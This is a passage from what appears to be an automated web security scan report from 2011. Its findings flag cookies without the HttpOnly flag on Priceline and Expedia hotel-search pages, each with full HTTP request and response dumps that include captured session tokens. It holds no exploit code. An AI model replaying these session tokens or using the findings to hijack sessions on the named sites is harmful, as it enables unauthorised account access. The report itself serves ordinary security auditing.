Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...

14.62. http://travela.priceline.com/hotel/searchHotels.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...

14.63. http://travela.priceline.com/hotel/searchHotels_process.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:11:03 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=5D8E9AED674339BB1969FF7371C4ACDA; Path=/hotel
Location: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=ISO-8859-1


14.64. http://travela.priceline.com/hotel/searchResults.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...

14.65. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:02 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:17:52 GMT; Path=/
Content-Length: 426876

<!DOCTYPE html>
<!-- rendered by MVC -->
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="language" content=""/>

<m
...[SNIP]...

14.66. http://www.expedia.com/Details

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Details

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=f80a6253-97ca-4b75-98ff-8895038babf3 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/TripPreferences?tripid=e0ec7dc7-accc-4a30-b5fb-7781275b132a&c=d8e96adc-f4c8-4481-b77d-30afb9785c2c
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:14 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:14 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`user=v.8,0,EX01E9F091F9$22$87001000$FF$5C37$0E$C1$C6!2$0E$C1$C6!2$0E$C1$C6$0E1000$11000$1E81!90$D1$9C$B9$EE$B3$32p$A2!i02000`125; Domain=.expedia.com; Path=/
Set-Cookie: p1=`accttype=v.2,8,1,EX014BD1106A$B48SBjmv$E3$7B$1Es$A7$BD3$18$E3$7D$14$5CM$B56$8F$E0j$13$F9$CBG$E6$F7v$A6`minfo=v.5,EX01EEEB4066$B48SBymv$FCb$10s$A7$BE3$18$E3$7D$14RM$B76$8F$E6j$13$FA$CEG$E6$F0v$916$3E$1Bn$2B$7D$2A$87$92$E2$FE$19$35$17Wf$0Bi$15$EC$26b$A33$93z$1Fd$871$12$3CM$7E`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247906574|1033|0|0||0|0|0|-1|-1`382; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:11:05 GMT; Path=/


14.67. http://www.expedia.com/Hotel-Search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Hotel-Search HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 9102
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

piid=6da35fba-7158-407e-a148-c2d242f8e3c3&hart=16706&pqar=441.86&pqtr=&oldr=bGxpdmBu&rfrr=-56908&hwrq=EX013A5C34E0DNGD110300%2429%24AF008Tq%249C%24ADH%24CB%2492%241B%24B7%2415%2495%242C%24D9O%24EC%24B
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=86f50a38-52dd-41f7-9a0a-0e0cc39da211
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:16 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:09 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:10:59 GMT; Path=/


14.68. http://www.expedia.com/Hotel-Search-WidgetInitJS

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search-WidgetInitJS

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotel-Search-WidgetInitJS?action=widgetInitJS&v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=00,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:28 GMT
Content-Length: 101505
Connection: close
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:28 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:42:18 GMT; Path=/

jQuery(document).ready(function($){
var $hotelSearchForm = $("#hotelSearchForm");
var $form = $("#hotelFilterForm");

$hotelSearchForm.bind("submit", function(e){
$hotelSe
...[SNIP]...

14.69. http://www.expedia.com/Hotels/Offers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=4215&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 00:14:15 GMT
Connection: close
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:13 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:18:03 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":24,"BookingCount":59,"HotelId":4215,"isValidViewCount":true,"isValidBookingCount":true}]}

14.70. http://www.expedia.com/Hotels/Offers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=894999&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; iEAPID=21187; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 01:02:38 GMT
Connection: close
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:02:38 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
